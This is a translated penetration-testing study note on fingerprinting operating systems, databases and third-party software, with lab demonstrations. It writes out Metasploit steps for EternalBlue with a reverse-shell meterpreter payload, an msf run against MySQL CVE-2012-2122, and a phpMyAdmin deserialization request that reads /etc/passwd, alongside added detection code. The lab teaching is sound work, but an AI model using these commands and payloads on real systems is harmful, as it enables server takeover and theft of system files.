
Day05 basic introduction - system and database, etc

2022-01-26 21:57:47 Wind feather writer


Statement: this article is just a personal study note, for communication and learning only; do not use it for illegal purposes.

Notes on Xiaodi's web security penetration testing training videos

Preface

Apart from the middleware, the hosting platform and the website's source code, the operating system, the database and third-party software platforms can also be vulnerable. Attacks on them can likewise directly affect web or server security and result in the takeover of website or server privileges.

Content

At the operating system level

Common ways to identify the operating system

Identify it through the website itself, or by scanning with the relevant software.

1. Determine the server OS by changing the case of the URL.

If the case change has no effect on the page, the server can be taken to be Windows, because file paths on Windows are not case sensitive.

If the case change produces an error, the website is running on a Linux server.

2. The TTL value of replies can also be used to judge the server OS, by comparing the observed value with the nearest default initial TTL.

3. nmap can be used to determine the operating system:

nmap -O IP
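The two heuristics above (URL case sensitivity and TTL), worked through as an added example that is not part of the original notes: the ping line, the status codes and the "nearest default TTL" rule are assumptions made here, and the TTL rule is only a hint, since proxies and load balancers answer with their own TTL.

```python
import re
from typing import Optional, Tuple

# Default initial TTL values of common OS families (well-known defaults).
INITIAL_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "network device or other Unix"}

PING_TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def ttl_from_ping_line(line: str) -> Optional[int]:
    """Extract the reply TTL from one line of ping output (None if absent)."""
    m = PING_TTL_RE.search(line)
    return int(m.group(1)) if m else None


def guess_os_from_ttl(observed_ttl: int) -> Tuple[str, int]:
    """Map a reply TTL to (os_family, estimated_hops).

    Every router on the path decrements the TTL by one, so the observed value
    sits just below the sender's default: the smallest default that is >= the
    observed value is the likely origin, and the gap is the hop count.
    Caveat: a proxy or load balancer in front of the host answers with its own TTL.
    """
    if not 0 < observed_ttl <= 255:
        raise ValueError("TTL must be between 1 and 255")
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    raise AssertionError("unreachable: 255 is the largest default")


def guess_os_from_url_case(status_lower: int, status_upper: int) -> str:
    """Apply the URL-case heuristic from the notes.

    status_lower is the HTTP status for the real path (e.g. /index.php) and
    status_upper the status for the same path in upper case (/INDEX.PHP).
    """
    if status_lower != 200:
        raise ValueError("the original path must exist (status 200) for the test to mean anything")
    if status_upper == status_lower:
        return "Windows (case-insensitive path)"
    return "Linux (case-sensitive path)"


if __name__ == "__main__":
    # Constructed sample ping reply line, not a real capture.
    ttl = ttl_from_ping_line("64 bytes from 192.168.3.31: icmp_seq=1 ttl=117 time=0.42 ms")
    print(ttl, guess_os_from_ttl(ttl))        # 117 ('Windows', 11)
    print(guess_os_from_url_case(200, 404))   # Linux (case-sensitive path)
```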

Briefly describe the difference between the two systems and why identification matters

Website paths, case sensitivity, and whether files written for one system work on the other (compatibility).

What the vulnerability types at the operating system level mean

Some vulnerabilities do little harm; others can lead to complete loss of server privileges.

Different vulnerability types create different conditions under which a vulnerability can be exploited.

Briefly describe the impact scope of vulnerabilities at the operating system level

Exploiting them can gain privileges on the host or disrupt certain services.

Database level

Common methods for identifying the database type

Identify the database through the website: the scripting language usually hints at the database it connects to, and the default port confirms it.

  Scripting language    Typical database    Default port
  ASP                   Access (Windows)    none
  PHP                   MySQL               3306
  ASPX                  MSSQL (Windows)     1433
  JSP                   MSSQL, Oracle       1521 (Oracle)
  Python                MongoDB             27017

Port scanning

Differences between database types and why recognizing them matters

Each database's security mechanisms, query syntax and structure differ slightly, and so do the vulnerabilities.

Common database vulnerability types and attacks

Weak password

Briefly describe the scope of vulnerability impact at the database level

Obtain the website administrator's data and log in to the backend; obtain user data and log in as users or modify their information. Vulnerabilities can be exploited through database operations, and database privileges, and from there website privileges, can be obtained.

Third party level

How to determine which third-party platforms or software are in use

Judge at multiple levels, not limited to port scanning; use different methods for different applications.

Briefly describe why you need to identify third-party platforms or software

Common third-party platform or software vulnerability types and attacks

Briefly describe the scope of third-party platform or software security testing

Addendum

Apart from routine web security and app security testing, other services on single or complex servers (mail, games, load balancing, etc.) can also be security testing targets. The testing principle for such targets is the same, only without a web application; the other classes of security issues still apply. So it is very important to have a clear idea of how to approach security testing.

Case presentation

  • Demonstration of the basic knowledge involved above
  • An operating system level vulnerability demonstration
  • Weak password and vulnerability demonstration of a database
  • A third-party application security vulnerability

The following cases do not require mastering exploitation of the vulnerabilities; just understand the vulnerabilities at each level.

Case study 1: Demonstration of the basic knowledge involved above

See the Content section above for details.

Case study 2: An operating system level vulnerability demonstration

This experiment was carried out on a target machine. Do not use it in unauthorized real environments; otherwise you bear the consequences yourself.

Environment configuration

Target machine:

win2008R2 x64
IP: 192.168.3.31
Port 445 open

Attacker:

kali
IP: 192.168.3.222

Operation

Start msf:

msfconsole    # start msf

use exploit/multi/handler    # generic handler module (not needed here; the next line selects the actual exploit module)

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp    # set the payload

View the configuration parameters:

msf5 > show options

Set the parameters:

set lhost 192.168.3.222    # set the local address (i.e. the attacker's IP)

set rhost 192.168.3.31     # set the target address

run

Get a shell:

meterpreter > shell

meterpreter > ipconfig

The output of ipconfig shows the target IP, 192.168.3.31.

Case study 3: Weak password and vulnerability demonstration of a database

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

Environment configuration

Target machine:

Ubuntu + vulhub range environment
IP: 192.168.131.135

Attacker:

kali

Operation

Start the range environment (the mysql vulnerability environment):

cd vulhub    # the vulhub project directory

cd mysql/CVE-2012-2122/

docker-compose up -d

The attack

Scan the ports with nmap.

Port 3306 is found open, which corresponds to the MySQL database service.

Look up MySQL database vulnerabilities; CVE-2012-2122, the MySQL authentication bypass vulnerability, matches.

Use msf to test the vulnerability.

Success.
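From the defender's side, both the weak-password case and the CVE-2012-2122 bypass (which relies on repeating the login many times in a row) show up in the server log as a burst of denied logins from one client. The detector below is an added example, not code from the notes or from vulhub; the log line format, the regexes and the thresholds are assumptions, and the log itself is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Line shapes are illustrative (constructed), modelled on MySQL's error/general log
# messages; adjust the regexes to the exact format your server emits.
DENIED_RE = re.compile(r"^(\S+) Access denied for user '([^']+)'@'([^']+)'")
CONNECT_RE = re.compile(r"^(\S+) Connect\s+([^@\s]+)@(\S+)")


def build_sample_log() -> List[str]:
    """Constructed log: ~300 rapid denials for root from one host, then a Connect."""
    base = datetime(2022, 1, 26, 21, 50, 0)
    lines = []
    for i in range(300):
        ts = (base + timedelta(milliseconds=30 * i)).isoformat(timespec="milliseconds")
        lines.append(f"{ts} Access denied for user 'root'@'192.168.131.1' (using password: YES)")
    ts = (base + timedelta(seconds=10)).isoformat(timespec="milliseconds")
    lines.append(f"{ts} Connect root@192.168.131.1 on")
    lines.append("2022-01-26T21:55:00.000 Access denied for user 'app'@'10.0.0.5' (using password: YES)")
    return lines


def detect_auth_bursts(lines: List[str], threshold: int = 20,
                       window_seconds: int = 10) -> List[Tuple[str, str, int, bool]]:
    """Return (user, host, peak_denials_in_window, connect_after_burst) per offender.

    A burst of denials from one (user, host) inside a short window is the signature
    of password guessing and of the CVE-2012-2122 retry loop alike; a successful
    Connect from the same pair right after the burst is the case to page on.
    """
    recent: Dict[Tuple[str, str], deque] = defaultdict(deque)  # denial timestamps in window
    alerts: Dict[Tuple[str, str], list] = {}                   # key -> [peak_count, success]
    for line in lines:
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m.group(1))
            key = (m.group(2), m.group(3))
            q = recent[key]
            q.append(ts)
            while ts - q[0] > timedelta(seconds=window_seconds):  # drop old denials
                q.popleft()
            if len(q) >= threshold:
                entry = alerts.setdefault(key, [0, False])
                entry[0] = max(entry[0], len(q))
            continue
        m = CONNECT_RE.match(line)
        if m and (m.group(2), m.group(3)) in alerts:
            alerts[(m.group(2), m.group(3))][1] = True
    return [(u, h, c, s) for (u, h), (c, s) in alerts.items()]
```

Running detect_auth_bursts(build_sample_log()) flags root from 192.168.131.1 with a burst of 300 followed by a successful connect, while the single denial for app is ignored.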

Case study 4: Demonstration of security vulnerabilities in a third-party application

https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/

Environment configuration

Target machine:

Ubuntu + vulhub range environment
IP: 192.168.56.130

Attacker:

win10 local physical machine

Operation

Start the vulnerability environment.

Visit http://your-ip:8080 and you will see the phpMyAdmin home page. Because no database is connected, an error is shown, but this vulnerability has nothing to do with the database, so ignore it.

Send the request with Burp Suite

Send the following request to read /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

Remember to change your-ip to the target IP.
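A detection-side view of the request above, as an added example that is not part of the notes or of vulhub: it flags a request to the legacy setup script and a serialized PHP object in a POST parameter. The two sample requests are constructed here, and the body is split on "&" by hand because serialized PHP contains ";" characters that older parse_qs versions treat as a separator.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Matches the start of a serialized PHP object/class, e.g. O:10:"PMA_Config":1:{
PHP_OBJECT_RE = re.compile(r'^\s*[OC]:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')

# Constructed sample requests (not captured traffic): a normal login POST and one
# shaped like the setup.php request in the notes.
BENIGN_REQUEST = (
    "POST /index.php HTTP/1.1\r\nHost: your-ip:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "pma_username=root&pma_password=secret"
)
SUSPICIOUS_REQUEST = (
    "POST /scripts/setup.php HTTP/1.1\r\nHost: your-ip:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
)


def parse_form_body(body: str) -> dict:
    """Split a urlencoded body on '&' only (serialized PHP contains ';')."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def inspect_request(raw: str) -> List[str]:
    """Return findings for one raw HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    findings = []
    if path.split("?", 1)[0].endswith("/scripts/setup.php"):
        findings.append("request to the legacy phpMyAdmin setup script")
    if method == "POST":
        for name, values in parse_form_body(body).items():
            if any(PHP_OBJECT_RE.match(v) for v in values):
                findings.append(f"serialized PHP object in parameter '{name}'")
    return findings
```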

Result

Resources involved

https://nmap.org/ # nmap

https://www.kali.org/ # kali Official website

https://vulhub.org/ # vulhub

https://github.com/hellogoldsnakeman/masnmapscan-V1.0 # masnmapscan Port scanner

copyright notice
author[Wind feather writer],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201262157444894.html
